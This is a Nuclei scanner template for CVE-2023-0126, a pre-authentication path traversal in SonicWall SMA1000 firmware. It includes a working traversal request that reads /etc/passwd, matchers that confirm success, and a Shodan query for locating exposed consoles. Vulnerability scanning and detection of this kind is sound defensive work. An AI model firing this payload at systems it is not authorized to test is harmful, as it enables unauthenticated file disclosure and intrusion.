nuclei-templates/http/cves/2023/CVE-2023-0126.yaml

52 lines
1.8 KiB
YAML

id: CVE-2023-0126
info:
name: SonicWall SMA1000 LFI
author: tess
severity: high
description: |
Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the affected device, potentially leading to unauthorized access or information disclosure.
remediation: |
Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-0126
- https://github.com/advisories/GHSA-mr28-27qx-phg3
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-0126
cwe-id: CWE-22
epss-score: 0.03857
epss-percentile: 0.91024
cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: sonicwall
product: sma1000_firmware
shodan-query: title:"Appliance Management Console Login"
tags: cve2023,cve,sonicwall,lfi,sma1000
http:
- method: GET
path:
- '{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: word
part: header
words:
- content/unknown
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a00473045022100f38431ccf1845254ef4cec2d6669a1fabe785923f988c44934e26e21ab1ad868022027b10f932c802a765bf2eb73243f63f18a4e8a48851ccc41c93f8147596b340e:922c64590222798bb761d5b6d8e72950